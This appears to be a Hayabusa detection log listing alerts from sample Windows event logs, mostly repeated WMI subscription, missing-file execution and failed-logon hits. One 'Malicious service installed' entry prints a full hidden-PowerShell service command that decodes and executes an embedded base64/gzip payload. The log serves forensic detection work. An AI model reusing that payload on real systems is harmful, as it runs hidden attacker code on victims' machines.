7832016-08-19 01:24:07.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7842016-08-19 01:24:07.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7852016-08-19 01:24:10.343 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7862016-08-19 01:24:10.343 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7872016-08-19 01:31:43.146 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7882016-08-19 01:33:09.568 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7892016-08-19 01:34:07.677 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7902016-08-19 01:35:01.052 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7912016-08-19 01:36:08.912 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7922016-08-19 01:40:11.872 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7932016-08-19 01:41:14.715 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7942016-08-19 01:42:51.887 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7952016-08-19 01:52:23.564 +09:00IE10Win721highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7962016-08-19 01:52:58.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7972016-08-19 01:52:59.704 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7982016-08-19 01:52:59.704 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7992016-08-19 01:55:00.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8002016-08-19 01:55:00.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8012016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8022016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8032016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8042016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8052016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8062016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8072016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8082016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8092016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8102016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8112016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8122016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8132016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8142016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8152016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8162016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8172016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8182016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8192016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8202016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8212016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8222016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8232016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8242016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8252016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8262016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8272016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8282016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8292016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8302016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8312016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8322016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8332016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8342016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8352016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8362016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8372016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8382016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8392016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8402016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8412016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8422016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8432016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8442016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8452016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8462016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8472016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8482016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8492016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8502016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8512016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8522016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8532016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8542016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8552016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8562016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8572016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8582016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8592016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8602016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8612016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8622016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8632016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8642016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8652016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8662016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8672016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8682016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8692016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8702016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8712016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8722016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8732016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8742016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8752016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8762016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8772016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8782016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8792016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8802016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8812016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8822016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8832016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8842016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8852016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8862016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8872016-08-19 01:56:48.190 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8882016-08-19 02:39:39.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8892016-08-19 02:39:39.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8902016-08-19 03:46:19.937 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8912016-08-19 03:46:20.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8922016-08-19 03:57:18.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8932016-08-19 03:57:18.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8942016-08-19 03:57:20.937 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8952016-08-19 03:57:20.937 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8962016-08-19 04:55:50.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
8972016-08-19 04:55:51.755 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8982016-08-19 04:55:51.755 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
8992016-08-19 04:57:52.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9002016-08-19 04:57:52.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9012016-08-19 05:40:21.230 +09:00IE10Win77045highMalicious service installedService: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9022016-08-19 05:40:21.230 +09:00IE10Win77045highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9032016-08-19 05:40:21.261 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9042016-08-19 05:40:21.261 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9052016-08-19 05:40:21.464 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9062016-08-19 07:54:48.533 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9072016-08-19 07:54:48.533 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9082016-08-19 11:07:47.443 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
